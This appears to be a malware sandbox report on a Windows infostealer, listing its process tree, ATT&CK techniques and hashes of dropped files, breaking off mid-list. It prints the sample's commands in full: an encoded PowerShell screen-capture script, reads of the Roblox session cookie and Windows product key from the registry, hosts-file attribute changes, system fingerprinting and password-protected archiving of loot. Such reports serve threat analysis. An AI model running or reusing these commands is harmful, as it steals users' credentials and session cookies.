    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:2424
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3600
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tttmvc0u\tttmvc0u.cmdline"
        5⤵
        
        PID:3704
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9A1D.tmp" "c:\Users\Admin\AppData\Local\Temp\tttmvc0u\CSCF8000EDC678F469F8F3DD18042B5A9A0.TMP"
        6⤵
        
        PID:3956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3768
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:3648
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:2248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2300
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:1828
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:1612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3348
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4404
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4136
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:216
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:1032
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:220
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:3292
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:4476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI19962\rar.exe a -r -hp"linus12" "C:\Users\Admin\AppData\Local\Temp\WGlBj.zip" *"
    3⤵
    PID:3612
  - - C:\Users\Admin\AppData\Local\Temp\_MEI19962\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI19962\rar.exe a -r -hp"linus12" "C:\Users\Admin\AppData\Local\Temp\WGlBj.zip" *
      4⤵
      Executes dropped EXE
      PID:3936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:1728
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:1964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:844
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:1880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:4444
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:3600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:2396
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:4972
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:4868
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3644

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
440cb38dbee06645cc8b74d51f6e5f71

SHA1
d7e61da91dc4502e9ae83281b88c1e48584edb7c

SHA256
8ef7a682dfd99ff5b7e9de0e1be43f0016d68695a43c33c028af2635cc15ecfe

SHA512
3aab19578535e6ba0f6beb5690c87d970292100704209d2dcebddcdd46c6bead27588ef5d98729bfd50606a54cc1edf608b3d15bef42c13b9982aaaf15de7fd6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d42b6da621e8df5674e26b799c8e2aa

SHA1
ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

SHA256
5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

SHA512
53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
085e0a3b869f290afea5688a8ac4e7c5

SHA1
0fedef5057708908bcca9e7572be8f46cef4f3ca

SHA256
1fed2c9bc05b3fcb93f493124dbf1680c6445f67e3d49680257183132514509c

SHA512
bbac0555a05dbe83154a90caa44a653c8a05c87594a211548b165c5b1d231e3818830e754c0b6de3e5cb64dba3a5ad18bebae05cb9157e1dd46bce2a86d18ede

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
17853c2782a29bae7aa9d733f585dc93

SHA1
4b5a105eadf3378b71e11591cbe6646aa4237d95

SHA256
c84fb8d554d8062ce96ae09bd06a22e12777c6646b205fe561f1e6d717c7dfc4

SHA512
b056c127a2966bf1b44281b111eaf2f85ef57ff15186c2013ceafef620f21d20c1c251d5b672790bd00be46270c69f07943577d79489b4c5393d320568e3de42

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
276798eeb29a49dc6e199768bc9c2e71

SHA1
5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

SHA256
cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

SHA512
0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES9A1D.tmp

Filesize
1KB

MD5
5d2e0ad00cce561e4e2d7e91b41a6329

SHA1
75b08484262bb2cdfd7078c11103b08d52fca74d

SHA256
394c778c82ea8cd653f940ff0b1d6f622f6617b3dbdcf9870ebe2dcd477877cc

SHA512
c99d9987c71b9838457513d7275fd8752ab7cffbbf8aca57a5d34481cf9d9b2ac65acd4411bc89d27dc746e0dfc31b21f96e324751a3ed9816d5c7a2673eff76

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19962\VCRUNTIME140.dll

Filesize
106KB

MD5
4585a96cc4eef6aafd5e27ea09147dc6

SHA1
489cfff1b19abbec98fda26ac8958005e88dd0cb

SHA256
a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736

SHA512
d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19962\_bz2.pyd

Filesize
48KB

MD5
554b7b0d0daca993e22b7d31ed498bc2

SHA1
ea7f1823e782d08a99b437c665d86fa734fe3fe4

SHA256
1db14a217c5279c106b9d55f440ccf19f35ef3a580188353b734e3e39099b13f

SHA512
4b36097eddd2c1d69ac98c7e98eebe7bb11a5117249ad36a99883732f643e21ecf58e6bea33b70974d600563dc0b0a30bead98bafb72537f8374b3d67979e60a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19962\_ctypes.pyd

Filesize
58KB

MD5
d603c8bfe4cfc71fe5134d64be2e929b

SHA1
ff27ea58f4f5b11b7eaa1c8884eac658e2e9248b

SHA256
5ee40bcaab13fa9cf064ecae6fc0da6d236120c06fa41602893f1010efaa52fe

SHA512
fcc0dbfbe402300ae47e1cb2469d1f733a910d573328fe7990d69625e933988ecc21ab22f432945a78995129885f4a9392e1cee224d14e940338046f61abe361

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19962\_decimal.pyd

Filesize
106KB

MD5
9cef71be6a40bc2387c383c217d158c7

SHA1
dd6bc79d69fc26e003d23b4e683e3fac21bc29cb

SHA256
677d9993bb887fef60f6657de6c239086ace7725c68853e7636e2ff4a8f0d009

SHA512
90e02054163d44d12c603debdc4213c5a862f609617d78dd29f7fd21a0bae82add4ceaf30024da681c2a65d08a8142c83eb81d8294f1284edfbeeb7d66c371c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19962\_hashlib.pyd

Filesize
35KB

MD5
32df18692606ce984614c7efda2eec27

SHA1
86084e39ab0aadf0ecfb82ce066b7bf14152961e

SHA256
b7c9c540d54ab59c16936e1639c6565cd35a8ca625f31753e57db9cbd0ee0065

SHA512
679f8956370edc4dee32475d8440a2d2f9b6dd0edd0e033e49fed7834a35c7ed51ccde0995d19ed0a559a4383b99ae8c11e4e686902db12a2a5e0a3f2c0f4a9d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19962\_lzma.pyd

Filesize
85KB

MD5
01629284f906c40f480e80104158f31a

SHA1
6ab85c66956856710f32aed6cdae64a60aea5f0f

SHA256
a201ec286b0233644ae62c6e418588243a3f2a0c5a6f556e0d68b3c747020812

SHA512
107a4e857dd78dd92be32911e3a574f861f3425e01ab4b1a7580ac799dc76122ce3165465d24c34ac7fc8f2810547ad72b4d4ba3de76d3d61ed9bf5b92e7f7d4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19962\_queue.pyd

Filesize
25KB

MD5
4a313dc23f9d0a1f328c74dd5cf3b9ab

SHA1
494f1f5ead41d41d324c82721ab7ca1d1b72c062

SHA256
2163010bfde88a6cc15380516d31955935e243b7ad43558a89380bf5fe86337e

SHA512
42c712b758b35c0005b3528af586233298c2df4ed9f5133b8469bca9ec421ab151ce63f3929898c73d616cd9707594fa5f96d623fc150e214a4b2276c23c296e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19962\_socket.pyd

Filesize
43KB

MD5
67897f8c3262aecb8c9f15292dd1e1f0

SHA1
74f1ef77dd3265846a504f98f2e2f080eadbf58a

SHA256
ddbfa852e32e20d67a0c3d718ce68e9403c858d5cad44ea6404aff302556aba7

SHA512
200b6570db2fbb2eac7f51cae8e16ffb89cd46d13fba94a7729a675f10f4432fc89a256fd6bd804feac528191bd116407fd58a0573487d905fc8fca022c1abba

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19962\_sqlite3.pyd

Filesize
56KB

MD5
230025cf18b0c20c5f4abba63d733ca8

SHA1
336248fde1973410a0746599e14485d068771e30

SHA256
30a3bc9ed8f36e3065b583d56503b81297f32b4744bff72dcf918407978ce332

SHA512
2c4d943c6587d28763cf7c21ad37cc4762674a75c643994b3e8e7c7b20576d5674cf700fdfaddc1a834d9bf034bf2f449d95351c236fde720505ccdd03369bb1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19962\_ssl.pyd

Filesize
62KB

MD5
0d15b2fdfa03be76917723686e77823c

SHA1
efd799a4a5e4f9d15226584dd2ee03956f37bdaf

SHA256
2fc63abe576c0d5fe031cf7ee0e2f11d9c510c6dbacfc5dd2e79e23da3650ee8

SHA512
e21ab5ebe8b97243cf32ca9181c311978e203852847e4beb5e6ada487038c37dec18a2b683e11e420e05ace014aca2172b2dda15930bab944053843e25623227

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19962\base_library.zip

Filesize
1.4MB

MD5
70d2f26b1ebdc7e349d884669a9a7bd3

SHA1
146a4580cc02823ff58fd9ac4bad5b351f8bd0d9

SHA256
9cb34abc6a4bb0e65d7923449fb75477f39f26e2db64ff3917ee5d731768667c

SHA512
087e28456f77a4171f6e51116bee1042ccf49832fb31d806d2340ba9daf662dec8faffdcff2ac8f6657f7eee00ae23f562165769fbc704f2c24cc7e2a7c53cb6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19962\blank.aes

Filesize
119KB

MD5
61b09e3950921b3b41773bd499a240ea

SHA1
25909f317bb114fdee8eccd3060c6a775c46f6c7

SHA256
fd21a244ac4fa63f31e2ff6c2b9884a0ed320f55b743d0af11027251db9b5f34

SHA512
ea4e2ee28272bce65ee1df004f7496aba0e6e5ddbce3e5179d272919e33cccc386fb3ef5070419bc7552c72e457a45efbed465cad35c1daf3170f18189b3e6db

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19962\libcrypto-1_1.dll

Filesize
1.1MB

MD5
